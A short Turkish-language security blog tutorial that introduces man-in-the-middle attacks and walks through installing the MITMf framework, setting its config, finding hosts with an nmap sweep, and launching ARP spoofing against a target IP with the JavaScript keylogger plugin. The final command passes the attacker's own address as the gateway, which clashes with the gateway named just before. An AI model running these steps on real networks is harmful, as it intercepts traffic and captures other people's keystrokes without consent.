Register Now

Login

Lost Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Login

Register Now

Canyoupwn.me ~

TR | MITMf Nedir ve Nasıl Kullanılır ?

Merhabalar,

Bu yazımızda MITMf isimli MITM ataklarını gerçekleştirmeye yarayan frameworkü ele alıp inceleyeceğiz. Öncelikle MITM nedir diye bir giriş yapalım.

MITM, Man In the Middle ın kısaltılmış hali olup, hedef ile network trafiğinin arasına girip çeşitli işlemler yapmaya yarayan atak methodudur.

1

Şimdi asıl işimiz olan MITMf tooluna gelirsek, öncelikle toola buradan ulaşabilirsiniz.

Şimdi uygulamamızı kurmamız için aşağıdaki komutları sırasıyla verelim.

git clone https://github.com/byt3bl33d3r/MITMf.git mitmf
pip install -r requirements.txt

 

Artık atak için hazır durumdayız.

Kullanılabilir pluginleri görmek için, “python mitmf.py –help” komutunu kullamamız gerekiyor. Aktif kullanabileceğimiz pluginler:

yZ3EDoG

Şimdi, konfigürasyonlarımızı ayarlamamız gerekiyor. Şu lokasyonda bulunuyor: ‘/usr/share/mitmf/config/mitmf.cfg.’

2

Yukarıdaki gibi FilePwn kısmına geldiğimizde CompressedFiles bölümünde HOST değerlerini görüyoruz. Bunları kendimize göre ayarlamamız gerekiyor.

3

Yukardaki gibi ekranı görüyor olacaksınız biraz daha aşağı indiğimizde.

Artık atak için tamamiyle hazırız.

 

Şimdi terminalden ‘ifconfig’ komutu ile IP ve Interface değerlerimizi öğreniyoruz. Ardından, ‘route -n’ komutu ile gateway değerimizi öğreniyoruz.

wlan0 şeklinde IP mizin 10.200.1.20 , gateway değerimizin, 10.200.1.1 olduğunu varsayalım. Şimdi yapmamız gereken şey, hedefin IPsini alıp gerekli işlemleri gerçekleştirmek. Bunun için:

nmap -sP -T4 10.200.1.0/24

 

Şeklinde bir NMAP taraması başlatıyoruz. Şimdi hedefimizin IP adresi, 10.200.1.35 olsun.

Biz şu şekilde bir JS Keylogger atak yapabiliriz.

sudo python mitmf.py --arp --spoof --i eth0 --gateway 10.200.1.20 --target 10.200.1.35 --jskeylogger

 

JS Keylogger benim en sevdiğim özellik olduğu için onu örnek gösterdim.

Diğer yazıda, bir başka teknik anlatmak üzere. İyi spooflamalar 🙂

About CanYouPwnMe

Hero!

Follow Me